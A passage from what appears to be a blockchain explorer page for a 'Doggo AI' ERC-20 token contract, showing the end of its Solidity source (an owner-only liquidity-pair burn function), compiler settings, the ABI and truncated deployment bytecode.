        require(percent <= 1000, "May not nuke more than 10% of tokens in LP");
        lastManualLpBurnTime = block.timestamp;

        // get balance of liquidity pair
        uint256 liquidityPairBalance = this.balanceOf(uniswapV2Pair);

        // calculate amount to burn
        uint256 amountToBurn = liquidityPairBalance.mul(percent).div(10000);

        // pull tokens from pancakePair liquidity and move to dead address permanently
        if (amountToBurn > 0) {
            super._transfer(uniswapV2Pair, address(0xdead), amountToBurn);
        }

        //sync price since this is not in a swap transaction!
        IUniswapV2Pair pair = IUniswapV2Pair(uniswapV2Pair);
        pair.sync();
        emit ManualNukeLP();
        return true;
    }
}

Settings
{
  "optimizer": {
    "enabled": false,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[],"name":"AutoNukeLP","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"sniper","type":"address"}],"name":"BoughtEarly","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[],"name":"ManualNukeLP","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiquidity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newAddress","type":"address"},{"indexed":true,"internalType":"address","name":"oldAddress","type":"address"}],"name":"UpdateUniswapV2Router","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"developmentWalletUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"marketingWalletUpdated","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_isExcludedMaxTransactionAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"automatedMarketMakerPairs","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyDevFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyLiquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyMarketingFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"deadAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"deployerWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"developmentWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"disableTransferDelay","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"enableTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"updAds","type":"address"},{"internalType":"bool","name":"isEx","type":"bool"}],"name":"excludeFromMaxTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"lastLpBurnTime","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"lastManualLpBurnTime","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"limitsInEffect","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"lpBurnEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"lpBurnFrequency","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"lpLocker","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"manualBurnFrequency","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"percent","type":"uint256"}],"name":"manualBurnLiquidityPairTokens","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"marketingWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"percentForLPBurn","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellDevFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellLiquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellMarketingFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_frequencyInSeconds","type":"uint256"},{"internalType":"uint256","name":"_percent","type":"uint256"},{"internalType":"bool","name":"_Enabled","type":"bool"}],"name":"setAutoLPBurnSettings","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"pair","type":"address"},{"internalType":"bool","name":"value","type":"bool"}],"name":"setAutomatedMarketMakerPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForDev","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForLiquidity","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForMarketing","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingActive","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"transferDelayEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_marketingFee","type":"uint256"},{"internalType":"uint256","name":"_liquidityFee","type":"uint256"},{"internalType":"uint256","name":"_devFee","type":"uint256"}],"name":"updateBuyFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newWallet","type":"address"}],"name":"updateDevelopmentWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newMarketingWallet","type":"address"}],"name":"updateMarketingWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxTxnAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxWalletAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_marketingFee","type":"uint256"},{"internalType":"uint256","name":"_liquidityFee","type":"uint256"},{"internalType":"uint256","name":"_devFee","type":"uint256"}],"name":"updateSellFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"enabled","type":"bool"}],"name":"updateSwapEnabled","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newAmount","type":"uint256"}],"name":"updateSwapTokensAtAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60c06040526032600d556001600e60006101000a81548160ff021916908315150217905550610258600f556107086011556001601360006101000a81548160ff0219169083151502179055506000601360016101000a81548160ff0219169083151502179055506000601360026101000a81548160ff0219169083151502179055506001601560006101000a81548160ff021916908315150217905550348015620000a957600080fd5b506040518060400160405280600881526020017f446f67676f2041490000000000000000000000000000000000000000000000008152506040518060400160405280600581526020017f444f47414900000000000000000000000000000000000000000000000000000081525081600390805190602001906200012e92919062000ca9565b5080600490805190602001906200014792919062000ca9565b5050506200016a6200015e6200076960201b60201c565b6200077160201b60201c565b6000737a250d5630b4cf539739df2c5dacb4c659f2488d9050620001968160016200083760201b60201c565b8073ffffffffffffffffffffffffffffffffffffffff1660808173ffffffffffffffffffffffffffffffffffffffff16815250508073ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000216573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200023c919062000dc3565b73ffffffffffffffffffffffffffffffffffffffff1663c9c65396308373ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015620002a4573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002ca919062000dc3565b6040518363ffffffff1660e01b8152600401620002e992919062000e06565b6020604051808303816000875af115801562000309573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200032f919062000dc3565b73ffffffffffffffffffffffffffffffffffffffff1660a08173ffffffffffffffffffffffffffffffffffffffff16815250506200037760a05160016200083760201b60201c565b6200038c60a05160016200092160201b60201c565b600060059050600060059050600080600f90506000600a905060006005905060006b033b2e3c9fd0803ce800000090506a108b2a2c28029094000000600a819055506a108b2a2c28029094000000600c81905550612710600582620003f2919062000e6c565b620003fe919062000efc565b600b819055508660178190555085601881905550846019819055506019546018546017546200042e919062000f34565b6200043a919062000f34565b60168190555083601b8190555082601c8190555081601d81905550601d54601c54601b546200046a919062000f34565b62000476919062000f34565b601a819055506200048c620009c260201b60201c565b600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550620004dc620009c260201b60201c565b600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506200052c620009c260201b60201c565b600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555073663a5c229c09b049e36dcc11a9b0d4a8eb9db214600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550620005e3620005d5620009c260201b60201c565b6001620009ec60201b60201c565b620005f6306001620009ec60201b60201c565b6200062b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166001620009ec60201b60201c565b62000660600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166001620009ec60201b60201c565b6200068262000674620009c260201b60201c565b60016200083760201b60201c565b620006953060016200083760201b60201c565b620006aa61dead60016200083760201b60201c565b620006df600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200083760201b60201c565b62000714600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200083760201b60201c565b62000749600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200083760201b60201c565b6200075b338262000b2660201b60201c565b505050505050505062001153565b600033905090565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b620008476200076960201b60201c565b73ffffffffffffffffffffffffffffffffffffffff166200086d620009c260201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1614620008c6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620008bd9062000ff2565b60405180910390fd5b80602260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b80602360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b620009fc6200076960201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1662000a22620009c260201b60201c565b73ffffffffffffffffffffffffffffffffffffffff161462000a7b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000a729062000ff2565b60405180910390fd5b80602160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df78260405162000b1a919062001031565b60405180910390a25050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141562000b99576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000b90906200109e565b60405180910390fd5b62000bad6000838362000c9f60201b60201c565b806002600082825462000bc1919062000f34565b92505081905550806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825462000c18919062000f34565b925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000c7f9190620010d1565b60405180910390a362000c9b6000838362000ca460201b60201c565b5050565b505050565b505050565b82805462000cb7906200111d565b90600052602060002090601f01602090048101928262000cdb576000855562000d27565b82601f1062000cf657805160ff191683800117855562000d27565b8280016001018555821562000d27579182015b8281111562000d2657825182559160200191906001019062000d09565b5b50905062000d36919062000d3a565b5090565b5b8082111562000d5557600081600090555060010162000d3b565b5090565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600062000d8b8262000d5e565b9050919050565b62000d9d8162000d7e565b811462000da957600080fd5b50565b60008151905062000dbd8162000d92565b92915050565b60006020828403121562000ddc5762000ddb62000d59565b5b600062000dec8482850162000dac565b91505092915050565b62000e008162000d7e565b82525050565b600060408201905062000e1d600083018562000df5565b62000e2c602083018462000df5565b9392505050565b6000819050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600062000e798262000e33565b915062000e868362000e33565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161562000ec25762000ec162000e3d565b5b828202905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600062000f098262000e33565b915062000f168362000e33565b92508262000f295762000f2862000ecd565b5b828204905092915050565b600062000f418262000e33565b915062000f4e8362000e33565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111562000f865762000f8562000e3d565b5b828201905092915050565b600082825260208201905092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600062000fda60208362000f91565b915062000fe78262000fa2565b602082019050919050565b600060208201905081810360008301526200100d8162000fcb565b9050919050565b60008115159050919050565b6200102b8162001014565b82525050565b600060208201905062001048600083018462001020565b92915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062001086601f8362000f91565b915062001093826200104e565b602082019050919050565b60006020820190508181036000830152620010b98162001077565b9050919050565b620010cb8162000e33565b82525050565b6000602082019050620010e86000830184620010c0565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200113657607f821691505b602082108114156200114d576200114c620010ee565b5b50919050565b60805160a051615d7d620011db6000396000818161134401528181611b5401528181612800015281816128b7015281816128e401528181612f280152818161408901528181614142015261416f01526000818161102301528181612ed0015281816142e5015281816143c6015281816143ed0152818161448901526144b00152615d7d6000f3fe6080604052600436106103c75760003560e01c80638da5cb5b116101f2578063c04a54141161010d578063e2f45605116100a0578063f2fde38b1161006f578063f2fde38b14610e6f578063f637434214610e98578063f8b45b0514610ec3578063fe72b27a14610eee576103ce565b8063e2f4560514610dc5578063e884f26014610df0578063f023f57314610e1b578063f11a24d314610e44576103ce565b8063c8c8ebe4116100dc578063c8c8ebe414610cf5578063d257b34f14610d20578063d85ba06314610d5d578063dd62ed3e14610d88576103ce565b8063c04a541414610c4d578063c17b5b8c14610c78578063c18bc19514610ca1578063c876d0b914610cca576103ce565b8063a0d82dc511610185578063aacebbe311610154578063aacebbe314610b93578063b62496f514610bbc578063bbc0c74214610bf9578063c024666814610c24576103ce565b8063a0d82dc514610ac3578063a457c2d714610aee578063a4c82a0014610b2b578063a9059cbb14610b56576103ce565b80639a7a23d6116101c15780639a7a23d614610a195780639c3b4fdc14610a425780639ec22c0e14610a6d5780639fccce3214610a98576103ce565b80638da5cb5b1461096f578063921369131461099a578063924de9b7146109c557806395d89b41146109ee576103ce565b806339509351116102e2578063715018a61161027557806375f0a8741161024457806375f0a874146108d95780637bce5a04146109045780638095d5641461092f5780638a8c523c14610958576103ce565b8063715018a614610845578063730c18881461085c578063751039fc146108855780637571336a146108b0576103ce565b80635d60c7be116102b15780635d60c7be146107875780636a486a8e146107b25780636ddd1713146107dd57806370a0823114610808576103ce565b806339509351146106b757806349bd5a5e146106f45780634a62bb651461071f5780634fbee1931461074a576103ce565b80631a8145bb1161035a57806327c8f8351161032957806327c8f8351461060b5780632c3e486c146106365780632e82f1a014610661578063313ce5671461068c576103ce565b80631a8145bb1461054f5780631f3fed8f1461057a578063203e727e146105a557806323b872dd146105ce576103ce565b80631694505e116103965780631694505e146104a357806318160ddd146104ce578063184c16c5146104f9578063199ffc7214610524576103ce565b806303fc2013146103d357806306fdde03146103fe578063095ea7b31461042957806310d5de5314610466576103ce565b366103ce57005b600080fd5b3480156103df57600080fd5b506103e8610f2b565b6040516103f591906145a0565b60405180910390f35b34801561040a57600080fd5b50610413610f51565b6040516104209190614654565b60405180910390f35b34801561043557600080fd5b50610450600480360381019061044b91906146dd565b610fe3565b60405161045d9190614738565b60405180910390f35b34801561047257600080fd5b5061048d60048036038101906104889190614753565b611001565b60405161049a9190614738565b60405180910390f35b3480156104af57600080fd5b506104b8611021565b6040516104c591906147df565b60405180910390f35b3480156104da57600080fd5b506104e3611045565b6040516104f09190614809565b60405180910390f35b34801561050557600080fd5b5061050e61104f565b60405161051b9190614809565b60405180910390f35b34801561053057600080fd5b50610539611055565b6040516105469190614809565b60405180910390f35b34801561055b57600080fd5b5061056461105b565b6040516105719190614809565b60405180910390f35b34801561058657600080fd5b5061058f611061565b60405161059c9190614809565b60405180910390f35b3480156105b157600080fd5b506105cc60048036038101906105c79190614824565b611067565b005b3480156105da57600080fd5b506105f560048036038101906105f09190614851565b611176565b6040516106029190614738565b60405180910390f35b34801561061757600080fd5b5061062061126e565b60405161062d91906145a0565b60405180910390f35b34801561064257600080fd5b5061064b611274565b6040516106589190614809565b60405180910390f35b34801561066d57600080fd5b5061067661127a565b6040516106839190614738565b60405180910390f35b34801561069857600080fd5b506106a161128d565b6040516106ae91906148c0565b60405180910390f35b3480156106c357600080fd5b506106de60048036038101906106d991906146dd565b611296565b6040516106eb9190614738565b60405180910390f35b34801561070057600080fd5b50610709611342565b60405161071691906145a0565b60405180910390f35b34801561072b57600080fd5b50610734611366565b6040516107419190614738565b60405180910390f35b34801561075657600080fd5b50610771600480360381019061076c9190614753565b611379565b60405161077e9190614738565b60405180910390f35b34801561079357600080fd5b5061079c6113cf565b6040516107a991906145a0565b60405180910390f35b3480156107be57600080fd5b506107c76113f5565b6040516107d49190614809565b60405180910390f35b3480156107e957600080fd5b506107f26113fb565b6040516107ff9190614738565b60405180910390f35b34801561081457600080fd5b5061082f600480360381019061082a9190614753565b61140e565b60405161083c9190614809565b60405180910390f35b34801561085157600080fd5b5061085a611456565b005b34801561086857600080fd5b50610883600480360381019061087e9190614907565b6114de565b005b34801561089157600080fd5b5061089a61161e565b6040516108a79190614738565b60405180910390f35b3480156108bc57600080fd5b506108d760048036038101906108d2919061495a565b6116be565b005b3480156108e557600080fd5b506108ee611795565b6040516108fb91906145a0565b60405180910390f35b34801561091057600080fd5b506109196117bb565b6040516109269190614809565b60405180910390f35b34801561093b57600080fd5b506109566004803603810190610951919061499a565b6117c1565b005b34801561096457600080fd5b5061096d6118c0565b005b34801561097b57600080fd5b5061098461197b565b60405161099191906145a0565b60405180910390f35b3480156109a657600080fd5b506109af6119a5565b6040516109bc9190614809565b60405180910390f35b3480156109d157600080fd5b506109ec60048036038101906109e791906149ed565b6119ab565b005b3480156109fa57600080fd5b50610a03611a44565b604051610a109190614654565b60405180910390f35b348015610a2557600080fd5b50610a406004803603810190610a3b919061495a565b611ad6565b005b348015610a4e57600080fd5b50610a57611bef565b604051610a649190614809565b60405180910390f35b348015610a7957600080fd5b50610a82611bf5565b604051610a8f9190614809565b60405180910390f35b348015610aa457600080fd5b50610aad611bfb565b604051610aba9190614809565b60405180910390f35b348015610acf57600080fd5b50610ad8611c01565b604051610ae59190614809565b60405180910390f35b348015610afa57600080fd5b50610b156004803603810190610b1091906146dd565b611c07565b604051610b229190614738565b60405180910390f35b348015610b3757600080fd5b50610b40611cf2565b604051610b4d9190614809565b60405180910390f35b348015610b6257600080fd5b50610b7d6004803603810190610b7891906146dd565b611cf8565b604051610b8a9190614738565b60405180910390f35b348015610b9f57600080fd5b50610bba6004803603810190610bb59190614753565b611d16565b005b348015610bc857600080fd5b50610be36004803603810190610bde9190614753565b611e52565b604051610bf09190614738565b60405180910390f35b348015610c0557600080fd5b50610c0e611e72565b604051610c1b9190614738565b60405180910390f35b348015610c3057600080fd5b50610c4b6004803603810190610c46919061495a565b611e85565b005b348015610c5957600080fd5b50610c62611faa565b604051610c6f91906145a0565b60405180910390f35b348015610c8457600080fd5b50610c9f6004803603810190610c9a919061499a565b611fd0565b005b348015610cad57600080fd5b50610cc86004803603810190610cc39190614824565b6120cf565b005b348015610cd657600080fd5b50610cdf6121de565b604051610cec9190614738565b60405180910390f35b348015610d0157600080fd5b50610d0a6121f1565b604051610d179190614809565b60405180910390f35b348015610d2c57600080fd5b50610d476004803603810190610d429190614824565b6121f7565b604051610d549190614738565b60405180910390f35b348015610d6957600080fd5b50610d7261234c565b604051610d7f9190614809565b60405180910390f35b348015610d9457600080fd5b50610daf6004803603810190610daa9190614a1a565b612352565b604051610dbc9190614809565b60405180910390f35b348015610dd157600080fd5b50610dda6123d9565b604051610de79190614809565b60405180910390f35b348015610dfc57600080fd5b50610e056123df565b604051610e129190614738565b60405180910390f35b348015610e2757600080fd5b50610e426004803603810190610e3d9190614753565b61247f565b005b348015610e5057600080fd5b50610e596125bb565b604051610e669190614809565b60405180910390f35b348015610e7b57600080fd5b50610e966004803603810190610e919190614753565b6125c1565b005b348015610ea457600080fd5b50610ead6126b9565b604051610eba9190614809565b60405180910390f35b348015610ecf57600080fd5b50610ed86126bf565b604051610ee59190614809565b60405180910390f35b348015610efa57600080fd5b50610f156004803603810190610f109190614824565b6126c5565b604051610f229190614738565b60405180910390f35b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b606060038054610f6090614a89565b80601f0160208091040260200160405190810160405280929190818152602001828054610f8c90614a89565b8015610fd95780601f10610fae57610100808354040283529160200191610fd9565b820191906000526020600020905b815481529060010190602001808311610fbc57829003601f168201915b5050505050905090565b6000610ff7610ff061299d565b84846129a5565b6001905092915050565b60226020528060005260406000206000915054906101000a900460ff1681565b7f000000000000000000000000000000000000000000000000000000000000000081565b6000600254905090565b60115481565b600d5481565b601f5481565b601e5481565b61106f61299d565b73ffffffffffffffffffffffffffffffffffffffff1661108d61197b565b73ffffffffffffffffffffffffffffffffffffffff16146110e3576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110da90614b07565b60405180910390fd5b670de0b6b3a76400006103e860016110f9611045565b6111039190614b56565b61110d9190614bdf565b6111179190614bdf565b811015611159576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161115090614c82565b60405180910390fd5b670de0b6b3a76400008161116d9190614b56565b600a8190555050565b6000611183848484612b70565b6000600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006111ce61299d565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508281101561124e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161124590614d14565b60405180910390fd5b6112628561125a61299d565b8584036129a5565b60019150509392505050565b61dead81565b600f5481565b600e60009054906101000a900460ff1681565b60006012905090565b60006113386112a361299d565b84846